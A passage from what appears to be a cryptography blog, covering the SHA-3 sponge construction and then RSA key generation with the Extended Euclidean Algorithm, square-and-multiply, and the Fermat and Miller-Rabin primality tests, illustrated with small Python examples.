<p>The actual sponge construction can be defined for a sponge conform padding <span class="math">\(y\)</span> and a permutation <span class="math">\(f\)</span>. Let <span class="math">\(x \in \{0,1\}^{\ast}\)</span> and let <span class="math">\(y(x) = y_1, y_2, ..., y_k\)</span> with block length <span class="math">\(|y_i|=r\)</span>. We define the states <span class="math">\(s_i, i \geq 0:\)</span></p>
<div class="math">$$s_i = 0^b, \text{ if } i=0$$</div>
<p> which initializes the sponge construction and
</p>
<div class="math">$$s_i = f(s_{i-1} \oplus (y_i||0^c)), \text{ if } 1 \leq i \leq k$$</div>
<p> which is called the <strong>Absorbing Phase</strong>: the result of the previous permutation is XORed with the current message block <span class="math">\(y_i\)</span> padded with <span class="math">\(c\)</span> zero bits, and the permutation is applied again. Then follows
</p>
<div class="math">$$s_i = f(s_{i-1}), \text{ if } i > k$$</div>
<p> which is called the <strong>Squeezing phase</strong>. When only the first result from the <strong>Squeezing phase</strong> is used, we obtain a SHA-3 value. The further results may be used as pseudo-random numbers.</p>
<p>The actual results from the sponge construction are the first <span class="math">\(r\)</span> bits from the squeezing phase <span class="math">\(z_i = s_{k+i-1}\)</span> for <span class="math">\(i \geq 1\)</span>. Because r is either <span class="math">\(1088\)</span> or <span class="math">\(1344\)</span>, only as many bits as required for the intended security level are taken.</p>
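<p>The recursion for <span class="math">\(s_i\)</span> and <span class="math">\(z_i\)</span> can be traced with a toy sponge. Everything concrete in the sketch below is an assumption made for illustration: the state width <span class="math">\(b=32\)</span>, the rate <span class="math">\(r=8\)</span>, and in particular <code>toy_permutation</code>, which is merely some bijection on 32 bit integers and has nothing to do with the real Keccak permutation. The message is assumed to be already padded and split into <span class="math">\(r\)</span> bit blocks given as integers.</p>

```python
B, R = 32, 8          # toy state width b and bit rate r (assumed values)
C = B - R             # capacity c
MASK = (1 << B) - 1


def toy_permutation(state: int) -> int:
    """A bijective toy mixing function on B-bit integers. NOT Keccak-f, NOT secure."""
    for round_constant in (0x9E3779B9, 0x7F4A7C15, 0x85EBCA6B):
        state = (state * 0x2545F491 + round_constant) & MASK  # odd multiplier is invertible mod 2^B
        state = ((state << 7) | (state >> (B - 7))) & MASK    # rotate left by 7 bits
        state ^= state >> 13                                  # invertible xor-shift
    return state


def toy_sponge(blocks, n_out):
    """Absorb the r-bit blocks y_1..y_k, then squeeze n_out output blocks."""
    state = 0                                    # s_0 = 0^b
    for y in blocks:                             # s_i = f(s_{i-1} XOR (y_i || 0^c))
        state = toy_permutation(state ^ (y << C))
    output = []
    for _ in range(n_out):
        output.append(state >> C)                # z_i = first r bits of s_{k+i-1}
        state = toy_permutation(state)           # s_i = f(s_{i-1}) for i > k
    return output


print(toy_sponge([0x48, 0x69, 0x81], n_out=4))
```

<p>Asking for more output blocks only extends the sequence; the blocks that were already squeezed stay the same, which is what makes the construction usable as a generator of pseudo-random bits.</p>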
<p>It can be shown that to obtain an inner collision, you must evaluate <span class="math">\(q \approx c \cdot 2^{c/2}\)</span> hash values. <span class="math">\(c\)</span> is either 256 or 512 and thus sufficiently large. Pre-image resistance is also <span class="math">\(\min(c/2, n)\)</span>, where <span class="math">\(n\)</span> is the chosen output length. This is roughly the same as what can be achieved with the birthday attack.</p>
<p>The permutation function <span class="math">\(f\)</span> applies a fixed sequence of bijective step functions (five per round) that manipulate the state. The internal state of Keccak can be represented as a <span class="math">\(5 \times 5 \times w\)</span> cube where <span class="math">\(w\)</span> is the word size of Keccak and <span class="math">\(w=64\)</span>. Therefore the permutation can be written as </p>
<div class="math">$$f: \{0,1\}^{5 \times 5 \times 64} \rightarrow \{0,1\}^{5 \times 5 \times 64}$$</div>
<p>It's not of particular interest here how the permutation function works. Readers who are interested can read a very nice introduction by <a href="https://pdfs.semanticscholar.org/8450/06456ff132a406444fa85aa7b5636266a8d0.pdf">Christof Paar here</a>.</p>
How to find large prime numbers for RSA with the Miller-Rabin Primality Test2018-08-12T19:05:00+02:002018-08-13T21:50:00+02:00Nikolai Tschachertag:incolumitas.com,2018-08-12:/2018/08/12/finding-large-prime-numbers-and-rsa-miller-rabin-test/<h2>Introduction</h2>
<p>All sources for this blog post can be found in the <a href="https://github.com/NikolaiT/Large-Primes-for-RSA">GitHub repository about large primes</a>. The most recent version of the sources may only be found in the GitHub repository.</p>
<p>It has been a long time since I found the energy to write a new blog post. In this article, I am going to dig into an interesting area of cryptography: The task to <strong>find large prime numbers</strong>. We hopefully are all familiar with the concept of prime numbers. Prime numbers are integers <span class="math">\(p > 1\)</span> which are divisible only by <span class="math">\(p\)</span> itself and <span class="math">\(1\)</span>. But why is it necessary to find large prime numbers in the area of cryptography?</p>
<p>One of the first asymmetric cryptosystems invented was RSA (1977). As with all public key algorithms, the security of RSA depends on the existence of a one-way function.</p>
<p>In the case of RSA, the one-way function is built on top of the integer factorization problem: Given two prime numbers <span class="math">\(p,q\in \mathbb{N}\)</span>, it is straightforward to calculate <span class="math">\(n=p \cdot q\)</span>, but it is computationally infeasible to reverse this multiplication by finding the factors <span class="math">\(p\)</span> and <span class="math">\(q\)</span> given the product <span class="math">\(n\)</span>. Even when the primes <span class="math">\(p\)</span> and <span class="math">\(q\)</span> are very large integers (say on the order of <span class="math">\(2^{1024}\)</span>), multiplication is computationally efficient. Prime factorization however is a <a href="https://en.wikipedia.org/wiki/Integer_factorization">computationally hard problem</a>. This one-way property is exploited in the asymmetric cryptosystem RSA.</p>
<p>In the following sections we introduce the necessary RSA cryptosystem theory and the required algorithms to implement RSA in a simple Python program. Please never use the resulting code in production, because I am most likely introducing some mistakes that compromise the security of the cryptosystem.</p>
<h2>RSA</h2>
<p>RSA is a public key cryptosystem that can be used for confidentiality, accountability and digital signatures. For this purpose every participant creates a public and a private key. In RSA, the private key is denoted as <span class="math">\(K_{private}=(d)\)</span> and the public key is <span class="math">\(K_{public}=(e,n)\)</span>. All operations within RSA are conducted in the ring <span class="math">\(\mathbb{Z_{n}}=\{0,1,...,n-1\}\)</span> and the numbers <span class="math">\(n,d,e\)</span> are usually very large integers with bit lengths larger than 512.</p>
<h3>Encryption</h3>
<p>To encrypt the plaintext <span class="math">\(x \in \mathbb{Z_{n}}\)</span>, the function</p>
<div class="math">$$y=e_{K_{public}}(x) \equiv x^e \pmod n$$</div>
<p>is calculated, whereby the ciphertext <span class="math">\(y\)</span> is again an element of <span class="math">\(\mathbb{Z_{n}}\)</span>.</p>
<h3>Decryption</h3>
<p>To decrypt the ciphertext <span class="math">\(y\)</span>, the private key <span class="math">\(K_{private}=(d)\)</span> is needed:</p>
<div class="math">$$x = d_{K_{private}}(y) \equiv y^d \pmod n$$</div>
<p>Encryption and decryption are essentially modular exponentiations within the ring <span class="math">\(\mathbb{Z_{n}}\)</span>. This means that we need to perform very large exponentiations with exponents of bit lengths of <span class="math">\(1024\)</span> and more. It turns out that there is a fast algorithm to perform this computation: <strong>The square-and-multiply algorithm.</strong></p>
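<p>With a toy key the two formulas can be tried out directly. The numbers below (<span class="math">\(p=61\)</span>, <span class="math">\(q=53\)</span>, <span class="math">\(e=17\)</span>, <span class="math">\(d=2753\)</span>) are assumptions chosen only because they are small enough to check by hand; Python's built-in <code>pow(x, k, n)</code> performs the modular exponentiation.</p>

```python
# Toy key, far too small for any real use (assumed values for illustration).
n = 61 * 53   # modulus n = p * q = 3233
e = 17        # public exponent
d = 2753      # private exponent: 17 * 2753 = 46801 = 15 * 3120 + 1


def encrypt(x: int, e: int, n: int) -> int:
    """y = x^e mod n"""
    return pow(x, e, n)


def decrypt(y: int, d: int, n: int) -> int:
    """x = y^d mod n"""
    return pow(y, d, n)


x = 65
y = encrypt(x, e, n)
print(y, decrypt(y, d, n))
```

<p>Decrypting the ciphertext returns the original plaintext 65, and the same holds for every other element of <span class="math">\(\mathbb{Z_{n}}\)</span>.</p>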
<p>This straightforward approach leaves us however with several requirements:</p>
<ul>
<li>It must be computationally infeasible to determine the private key <span class="math">\(d\)</span> from the public key <span class="math">\((e,n)\)</span>.</li>
<li>The amount of data that can be encrypted at once is bounded by <span class="math">\(n\)</span>, because the plaintext must be an element of <span class="math">\(\mathbb{Z_{n}}\)</span>. When we choose <span class="math">\(n \approx 2^{1024}\)</span>, we may encrypt roughly <span class="math">\(1024\)</span> bits at once. Keep in mind that asymmetric cryptography is not intended for encryption of large datasets anyway. The usual approach is to exchange a symmetric session key with public key cryptography and then to continue working with symmetric block ciphers like AES. Therefore, the limited amount of data that can be encrypted at once does not pose a practical limitation.</li>
</ul>
<h3>Key Generation for RSA</h3>
<p>Key generation for the public key <span class="math">\(K_{public}=(e,n)\)</span> and the private key <span class="math">\(K_{private}=(d)\)</span> is done by the following algorithm:</p>
<ol>
<li>Find two large primes <span class="math">\(p\)</span> and <span class="math">\(q\)</span> with bit-lengths of at least <span class="math">\(1024\)</span> bit</li>
<li>Calculate <span class="math">\(n=p \cdot q\)</span></li>
<li>Compute Euler's totient function <div class="math">$$\phi(n) = (q-1) \cdot (p-1)$$</div>
</li>
<li>Choose a public exponent <span class="math">\(e \in \{1,2,...,\phi(n)-1\}\)</span> such that <div class="math">$$gcd(e, \phi(n)) = 1$$</div>
</li>
<li>Find the private key <span class="math">\(K_{private}=(d)\)</span> such that <div class="math">$$d \cdot e \equiv 1 \pmod{\phi(n)}$$</div>
</li>
</ol>
<p>Finding keys <span class="math">\(d\)</span> and <span class="math">\(e\)</span> is done by randomly picking a public exponent <span class="math">\(e \in \{1,2,...,\phi(n)-1\}\)</span> and checking whether <span class="math">\(e\)</span> satisfies <span class="math">\(gcd(e, \phi(n)) = 1\)</span>. If this isn't the case, you can simply pick another <span class="math">\(e\)</span>. We then apply the Extended Euclidean Algorithm (EEA) with the parameters <span class="math">\(\phi(n)\)</span> and <span class="math">\(e\)</span> and obtain the equation</p>
<div class="math">$$gcd(\phi(n), e) = s \cdot \phi(n) + t \cdot e$$</div>
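<p>Because <span class="math">\(gcd(\phi(n), e) = 1\)</span>, reducing this equation modulo <span class="math">\(\phi(n)\)</span> gives <span class="math">\(t \cdot e \equiv 1 \pmod{\phi(n)}\)</span>. The parameter <span class="math">\(t\)</span> computed by the EEA is therefore the inverse of <span class="math">\(e\)</span> modulo <span class="math">\(\phi(n)\)</span>, and <span class="math">\(d = t \bmod \phi(n)\)</span>. The parameter <span class="math">\(s\)</span> can be ignored for the purpose of RSA.</p>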
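<p>The reduction modulo <span class="math">\(\phi(n)\)</span> matters because <span class="math">\(t\)</span> is often negative. The sketch below shows this for the assumed toy values <span class="math">\(\phi(n)=3120\)</span> and <span class="math">\(e=17\)</span>. The recursive helper <code>extended_gcd</code> is a compact stand-in written for this example, and the cross-check with <code>pow(e, -1, phi_n)</code> requires Python 3.8 or newer.</p>

```python
def extended_gcd(a: int, b: int):
    """Return (g, s, t) such that g = gcd(a, b) = s*a + t*b."""
    if b == 0:
        return a, 1, 0
    g, s, t = extended_gcd(b, a % b)
    return g, t, s - (a // b) * t


phi_n = (61 - 1) * (53 - 1)   # 3120
e = 17

g, s, t = extended_gcd(phi_n, e)
d = t % phi_n                 # map the possibly negative t into {0, ..., phi_n - 1}

print(g, s, t)                # 1 2 -367
print(d)                      # 2753
print(d == pow(e, -1, phi_n)) # built-in modular inverse agrees
```

<p>Here <span class="math">\(1 = 2 \cdot 3120 - 367 \cdot 17\)</span>, so <span class="math">\(t=-367\)</span> and <span class="math">\(d = -367 \bmod 3120 = 2753\)</span>.</p>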
<h4>Extended Euclidean Algorithm (EEA)</h4>
<p>As mentioned before, we need to compute <span class="math">\(gcd(\phi(n), e)\)</span> after we have chosen the public key exponent <span class="math">\(e \in \{1,2,...,\phi(n)-1\}\)</span> to obtain the form:
</p>
<div class="math">$$gcd(\phi(n), e) = s \cdot \phi(n) + t \cdot e$$</div>
<p> where <span class="math">\(s\)</span> and <span class="math">\(t\)</span> are integer coefficients. This can be done by computing the standard Euclidean Algorithm and simultaneously calculating the current remainder <span class="math">\(r_i\)</span> as <span class="math">\(r_i = s_i \cdot r_0 + t_i \cdot r_1\)</span>.
The EEA algorithm is implemented below in Python. This implementation is not very efficient and not pretty at all, but it is sufficient for our purposes.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="k">def</span> <span class="nf">EEA</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Source: https://en.wikibooks.org/wiki/Algorithm_Implementation/Mathematics/Extended_Euclidean_algorithm</span>
<span class="sd">    Extended Euclidean Algorithm (EEA)</span>
<span class="sd">    Parameters: Positive integers a and b whereby a > b</span>
<span class="sd">    Returns: ( gcd(a,b), s, t ) such that gcd(a,b) = s*a + t*b</span>
<span class="sd">    """</span>
    <span class="k">assert</span> <span class="n">a</span> <span class="o">></span> <span class="n">b</span><span class="p">,</span> <span class="s1">'a must be larger than b'</span>
    <span class="c1"># x0 and y0 track the coefficients of the original b and a</span>
    <span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">y0</span><span class="p">,</span> <span class="n">y1</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span>
    <span class="k">while</span> <span class="n">a</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">q</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">a</span> <span class="o">=</span> <span class="n">b</span> <span class="o">//</span> <span class="n">a</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span> <span class="o">%</span> <span class="n">a</span>
        <span class="n">x0</span><span class="p">,</span> <span class="n">x1</span> <span class="o">=</span> <span class="n">x1</span><span class="p">,</span> <span class="n">x0</span> <span class="o">-</span> <span class="n">q</span> <span class="o">*</span> <span class="n">x1</span>
        <span class="n">y0</span><span class="p">,</span> <span class="n">y1</span> <span class="o">=</span> <span class="n">y1</span><span class="p">,</span> <span class="n">y0</span> <span class="o">-</span> <span class="n">q</span> <span class="o">*</span> <span class="n">y1</span>
    <span class="k">return</span> <span class="n">b</span><span class="p">,</span> <span class="n">y0</span><span class="p">,</span> <span class="n">x0</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">EEA</span><span class="p">(</span><span class="mi">30</span><span class="p">,</span> <span class="mi">5</span><span class="p">))</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">EEA</span><span class="p">(</span><span class="mi">17</span><span class="p">,</span> <span class="mi">5</span><span class="p">))</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">EEA</span><span class="p">(</span><span class="mi">234232</span><span class="p">,</span> <span class="mi">774</span><span class="p">))</span>
</code></pre></div>
<h4>Square and Multiply Algorithm</h4>
<p>As we have seen in the RSA encryption and decryption functions, we need to compute exponentiations with huge exponents of bit lengths of at least <span class="math">\(1024\)</span>. This computation is done efficiently with the square and multiply algorithm illustrated below. When an optional modulus <span class="math">\(p\)</span> is supplied, the modular exponentiation is computed. The square and multiply algorithm is equivalent to the Python one-liner <code>pow(x, k, p)</code>.</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">square_and_multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">p</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Square and Multiply Algorithm</span>
<span class="sd">    Parameters: positive integer x and non-negative integer exponent k,</span>
<span class="sd">                optional modulus p</span>
<span class="sd">    Returns: x**k or x**k mod p when p is given</span>
<span class="sd">    """</span>
    <span class="c1"># binary digits of k, most significant bit first</span>
    <span class="n">b</span> <span class="o">=</span> <span class="nb">bin</span><span class="p">(</span><span class="n">k</span><span class="p">)[</span><span class="mi">2</span><span class="p">:]</span>
    <span class="n">r</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">b</span><span class="p">:</span>
        <span class="n">r</span> <span class="o">=</span> <span class="n">r</span><span class="o">**</span><span class="mi">2</span>
        <span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="s1">'1'</span><span class="p">:</span>
            <span class="n">r</span> <span class="o">=</span> <span class="n">r</span> <span class="o">*</span> <span class="n">x</span>
        <span class="k">if</span> <span class="n">p</span><span class="p">:</span>
            <span class="n">r</span> <span class="o">%=</span> <span class="n">p</span>
    <span class="k">return</span> <span class="n">r</span>
</code></pre></div>
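<p>To get a feeling for why this is fast, the following sketch counts the modular multiplications for a 1024 bit exponent. The function <code>square_and_multiply_counted</code> is a variant written only for this measurement, and the concrete base and modulus are arbitrary assumptions.</p>

```python
def square_and_multiply_counted(x: int, k: int, p: int):
    """Return (x**k mod p, number of modular multiplications performed)."""
    result, operations = 1, 0
    for bit in bin(k)[2:]:
        result = (result * result) % p   # one squaring per exponent bit
        operations += 1
        if bit == "1":
            result = (result * x) % p    # one extra multiplication per 1 bit
            operations += 1
    return result, operations


exponent = 2**1024 - 1                   # 1024 bits, all of them set (worst case)
value, operations = square_and_multiply_counted(5, exponent, 2**127 - 1)

print(operations)
print(value == pow(5, exponent, 2**127 - 1))
```

<p>Even in this worst case the loop needs only two multiplications per exponent bit, i.e. 2048 in total, whereas multiplying by <span class="math">\(x\)</span> one step at a time would take about <span class="math">\(2^{1024}\)</span> operations.</p>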
<h3>Practical Key Generation for RSA</h3>
<p>Now that we have established the necessary theory and algorithms for the key generation, we can implement the second part of the key generation algorithm. The first part, <strong>how to find large primes</strong>, is the main contribution of this article and is covered afterwards. For now, let's just assume that we already have a method to create large prime numbers <span class="math">\(p\)</span> and <span class="math">\(q\)</span>.</p>
<p>Therefore, we need to perform the steps 2. to 5. in the key generation process.</p>
<ol>
<li>Calculate <span class="math">\(n=p \cdot q\)</span></li>
<li>Compute <span class="math">\(\phi(n) = (q-1) \cdot (p-1)\)</span></li>
<li>Choose a public exponent <span class="math">\(e \in \{1,2,...,\phi(n)-1\}\)</span> such that <div class="math">$$gcd(e, \phi(n)) = 1$$</div>
</li>
<li>Find the private key <span class="math">\(K_{private}=(d)\)</span> such that <div class="math">$$d \cdot e \equiv 1 \pmod{\phi(n)}$$</div>
</li>
</ol>
<p>I implemented those steps in the Python code below. Please don't use this code since it is intentionally erroneous.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">math</span>
<span class="kn">import</span> <span class="nn">secrets</span>
<span class="kn">import</span> <span class="nn">eea</span>
<span class="k">def</span> <span class="nf">RSA_keygen</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">q</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Perform steps 2. to 5. in the RSA Key Generation process.</span>
<span class="sd">    """</span>
    <span class="c1"># step 2</span>
    <span class="n">n</span> <span class="o">=</span> <span class="n">p</span> <span class="o">*</span> <span class="n">q</span>
    <span class="c1"># step 3</span>
    <span class="n">phi_n</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
    <span class="c1"># step 4 and step 5</span>
    <span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
        <span class="c1"># pick e from {2, ..., phi_n - 1}; e = 1 is skipped because it would</span>
        <span class="c1"># leave the plaintext unchanged. secrets works for arbitrarily large integers.</span>
        <span class="n">e</span> <span class="o">=</span> <span class="n">secrets</span><span class="o">.</span><span class="n">randbelow</span><span class="p">(</span><span class="n">phi_n</span> <span class="o">-</span> <span class="mi">2</span><span class="p">)</span> <span class="o">+</span> <span class="mi">2</span>
        <span class="k">if</span> <span class="n">math</span><span class="o">.</span><span class="n">gcd</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">phi_n</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
            <span class="c1"># step 5</span>
            <span class="n">gcd</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">eea</span><span class="o">.</span><span class="n">EEA</span><span class="p">(</span><span class="n">phi_n</span><span class="p">,</span> <span class="n">e</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">gcd</span> <span class="o">==</span> <span class="p">(</span><span class="n">s</span><span class="o">*</span><span class="n">phi_n</span> <span class="o">+</span> <span class="n">t</span><span class="o">*</span><span class="n">e</span><span class="p">):</span>
                <span class="n">d</span> <span class="o">=</span> <span class="n">t</span> <span class="o">%</span> <span class="n">phi_n</span>
                <span class="k">break</span>
    <span class="k">return</span> <span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">d</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">RSA_keygen</span><span class="p">(</span><span class="mi">53</span><span class="p">,</span> <span class="mi">179</span><span class="p">))</span>
</code></pre></div>
<h2>Generating large prime numbers <span class="math">\(p\)</span> and <span class="math">\(q\)</span> for RSA</h2>
<p>Now that we completed all steps in the RSA key generation algorithm, we arrive at the last hurdle: How to find large prime numbers? The reader might suspect that the problem of determining whether an integer is a prime number is as hard as the problem of factorizing a product of two primes. Of course, if we knew the factorization of a number, we could say whether this number is a prime or not. But do we need to factorize the numbers <span class="math">\(p\)</span> and <span class="math">\(q\)</span> in order to make a statement about their primality? Luckily, the answer is no. Primality tests exist that are computationally much more efficient than the integer factorization algorithms. Two such primality tests are discussed here.</p>
<p>One is called <strong>Fermat Primality Test</strong> and the other is known as the <strong>Miller-Rabin Primality Test</strong>. Both tests work with probabilities. They either output <strong>"the number is a composite"</strong> or <strong>"the number is a prime"</strong>. While the first statement is always true, the second statement is only true with a certain probability. Therefore those algorithms are probabilistic algorithms, so called <strong>Monte Carlo Algorithms</strong>. They output a primality statement with configurable probability.</p>
<p>For using RSA, we should choose the prime numbers <span class="math">\(p\)</span> and <span class="math">\(q\)</span> to have equal bit lengths. So if we want RSA to run with an <span class="math">\(n\)</span> of 1024 bits, <span class="math">\(p\)</span> and <span class="math">\(q\)</span> should each have a bit length of roughly 512, i.e. be of magnitude <span class="math">\(2^{512}\)</span>. But how can we be certain that there even exist prime numbers in those high ranges?</p>
<p>The <a href="https://en.wikipedia.org/wiki/Prime_number_theorem">prime number theorem</a> implies that the probability that a random integer <span class="math">\(k\)</span> is prime is <span class="math">\(P(k\text{ is a prime}) \approx \frac{1}{\ln(k)}\)</span>. This follows from the main statement of the theorem, which describes the asymptotic distribution of the primes among the positive integers. This essentially means that the likelihood of a number being prime decreases slowly, the bigger the numbers get. The prime counting function <span class="math">\(\pi(x)\)</span> gives the number of primes less than or equal to the real number <span class="math">\(x\)</span>. The theorem states that the prime counting function is approximately </p>
<div class="math">$$\pi(x) \approx \frac{x}{ln(x)}$$</div>
<p>Since even numbers can be skipped right away, the probability that a random odd integer <span class="math">\(k\)</span> with bit length 512 is a prime is roughly </p>
<div class="math">$$P(k \text{ is prime}) \approx \frac{2}{\ln(2^{512})} = \frac{2}{512 \cdot \ln(2)} \approx \frac{1}{177}$$</div>
<p>
which is a sufficiently high probability to <strong>just randomly try out some odd numbers</strong> and check them with the aforementioned primality tests. Of course, this process of randomly generating integer candidates must not follow any deterministic logic. Otherwise an attacker could just replay the number-generating process to find the primes that were used with RSA.</p>
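<p>The estimate above can be reproduced in a few lines. The following is only a sketch: the helper names <code>expected_odd_candidates</code> and <code>random_odd_candidate</code> are made up for illustration, and the candidates are drawn with Python's <code>secrets</code> module so that they are not reproducible by an attacker.</p>

```python
import math
import secrets

def expected_odd_candidates(bits):
    """Rough number of random odd integers near 2**bits to test per prime found."""
    # Prime number theorem: the density of primes near 2**bits is about
    # 1 / ln(2**bits); skipping the even numbers doubles the hit rate.
    return bits * math.log(2) / 2

def random_odd_candidate(bits):
    """Draw an unpredictable odd integer with exactly `bits` bits."""
    x = secrets.randbits(bits)
    x |= 2 ** (bits - 1)   # force the top bit so the bit length is exact
    x |= 1                 # force the low bit so the number is odd
    return x

print(round(expected_odd_candidates(512)))   # about 177
candidate = random_odd_candidate(512)
print(candidate.bit_length(), candidate % 2)
```

<p>Forcing the top bit guarantees the requested bit length, which plain random bits do not.</p>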
<h3>Fermat Primality Test</h3>
<p>We will not use the Fermat Primality Test, because it is not used in practice. However, we quickly explain how it works. The test is based on <strong>Fermat's Little Theorem</strong>, which states that for any prime number <span class="math">\(p\)</span> and any integer <span class="math">\(a\)</span> that is not divisible by <span class="math">\(p\)</span>, the following congruence holds: </p>
<div class="math">$$a^{p-1} \equiv 1 \pmod p$$</div>
<p>The Fermat Primality Test implemented in Python looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">random</span>

<span class="k">def</span> <span class="nf">fermat_primality_test</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">s</span><span class="o">=</span><span class="mi">5</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    a^(p-1) ≡ 1 mod p</span>
<span class="sd">    Input: prime candidate p and security parameter s</span>
<span class="sd">    Output: False if p is composite (always correct), or</span>
<span class="sd">            True if p is prime (only with a certain probability)</span>
<span class="sd">    """</span>
    <span class="k">if</span> <span class="n">p</span> <span class="ow">in</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">):</span> <span class="c1"># small primes, randrange below needs p of at least 5</span>
        <span class="k">return</span> <span class="kc">True</span>
    <span class="k">if</span> <span class="n">p</span> <span class="o"><</span> <span class="mi">2</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">p</span> <span class="o">&</span> <span class="mi">1</span><span class="p">:</span> <span class="c1"># 0, 1, negatives and even numbers can't be prime</span>
        <span class="k">return</span> <span class="kc">False</span>

    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
        <span class="n">a</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span>
        <span class="n">x</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="c1"># a**(p-1) % p</span>
        <span class="k">if</span> <span class="n">x</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">:</span>
            <span class="k">return</span> <span class="kc">False</span>
    <span class="k">return</span> <span class="kc">True</span>
</code></pre></div>
<p>The weakness of the Fermat Primality Test is that it reports so-called <a href="https://en.wikipedia.org/wiki/Carmichael_number">Carmichael Numbers</a> as false positives. These composite numbers satisfy the congruence of Fermat's Little Theorem for every base <span class="math">\(a\)</span> that is coprime to them, so the test detects them as primes even though they are only pseudoprimes. For this reason, we are going to use a better primality test, <strong>the Miller-Rabin Test</strong>.</p>
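<p>To make the false positives concrete, here is a small sketch that checks the smallest Carmichael number, 561 = 3 · 11 · 17, against every possible base. The helper name <code>fermat_liar_bases</code> is made up for this illustration.</p>

```python
import math

def fermat_liar_bases(n):
    """Return the bases a in [2, n-2] with a**(n-1) % n == 1."""
    return [a for a in range(2, n - 1) if pow(a, n - 1, n) == 1]

n = 561  # 3 * 11 * 17, the smallest Carmichael number
coprime_bases = [a for a in range(2, n - 1) if math.gcd(a, n) == 1]
liars = fermat_liar_bases(n)

# Every base coprime to 561 passes the Fermat check although 561 is composite.
print(liars == coprime_bases)                # True
print(len(liars), "of", n - 3, "bases pass")  # 318 of 558 bases pass
```

<p>Only the bases that share a factor with 561 expose it, so a single random round misses the compositeness more often than not.</p>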
<h3>Miller-Rabin Primality Test</h3>
<p>The Miller-Rabin Primality Test does not suffer from the limitations of the Fermat Primality Test. The test is based on the following mathematical observations. Every odd prime candidate <span class="math">\(\hat p\)</span> can be decomposed into the form </p>
<div class="math">$$\hat p - 1 = 2^u \cdot r$$</div>
<p> where <span class="math">\(r\)</span> is an odd integer. Let's say <span class="math">\(\hat p = 12162881\)</span>, then we can write <span class="math">\(\hat p-1\)</span> in binary form </p>
<div class="math">$$\hat p-1 = 101110011001011101000000_2$$</div>
<p> The six zeroes on the right of the binary representation form the <span class="math">\(2^u\)</span> part, so <span class="math">\(u = 6\)</span>, and the rest <span class="math">\(101110011001011101_2 = 190045\)</span> is the odd <span class="math">\(r\)</span> part. So, </p>
<div class="math">$$\hat p-1 = 2^6 \cdot 190045 = 12162880$$</div>
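<p>The same decomposition can be computed by dividing out factors of two. This is a minimal sketch, and the function name <code>decompose</code> is chosen here for illustration only.</p>

```python
def decompose(n):
    """Write n - 1 as 2**u * r with r odd and return (u, r).

    Assumes n is an odd integer of at least 3.
    """
    r = n - 1
    u = 0
    while r % 2 == 0:
        r //= 2
        u += 1
    return u, r

u, r = decompose(12162881)
print(u, r, bin(r))   # 6 190045 0b101110011001011101
```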
<p>So for any odd integer <span class="math">\(\hat p\)</span> we can write <span class="math">\(\hat p - 1 = 2^u \cdot r\)</span> with <span class="math">\(r\)</span> odd. Now if we can find an integer <span class="math">\(a\)</span> such that </p>
<div class="math">$$a^r \not\equiv 1 \text{ mod } \hat p$$</div>
<p> and </p>
<div class="math">$$a^{r2^{k}} \not\equiv \hat p-1 \text{ mod } \hat p$$</div>
